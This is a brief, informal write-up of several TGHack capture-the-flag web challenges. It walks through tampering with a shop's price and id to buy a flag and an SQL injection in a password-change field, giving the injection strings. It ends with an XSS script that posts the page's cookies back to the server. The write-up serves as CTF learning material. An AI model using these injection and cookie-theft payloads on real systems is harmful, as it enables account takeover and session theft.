Tghack CTF WP
Redux
Author: Nora - Norasaurus#8234
Here is your Gaia form to get your weekly plant rations. Complete the form and reap your reward!
FLAG in a JavaScript File.
Shop
Author: Roy Olav Purser - roypur#9953
We found the Mother cult merch store. In addition to selling clothing items they sell some secrets we need. For the time being we haven’t been able to secure the funds necessary to do so. Can you help us?
O-M-G,I regret it very much.😂My friends and I were still discussing last night about it might have changed the price to negative. I found it could be bought when the id undefined. But I forgot to check it when price to negative.
We use burp suite to packet capture and change the price to negative .It is very important to change the id to undefined.
e g:
And then,it happened that is amazing!We have more money!
OK,we can buy the flag….
Bobby
Author: Roy Olav Purser - roypur#9953
Little bobby forgot his password. Can you help him log in?
I didn’t find any bugs in this container at 1st😭.After a long time,My classmate told me ,it has an SQL injection in the new password param when you change the pass.
We can know that it’s a update sql and we can control a param .
eg:
update table set column=’param’ where ……
1st,I want to commented out “where“ and I write payload like the following . But it can ‘t change passwd and throw me an error…..
admin'-- ' WHERE user=? AND pass=?
From here we should bind 2 params to this sql.So we change this payload like this:
admin',user=? , pass=? -- 
And then , we changed this admin’s pass,we can get flag, when we login.
Exfiltration
Author: Roy Olav Purser - roypur#9953
We have found a forum used by members of the Mother cult. The members are sitting behind an advanced firewall without access to the internet. We need their super secret information.
<script>
let xhr = new XMLHttpRequest();
xhr.open("post", window.location.href, true);
xhr.send(document.cookie);
</script>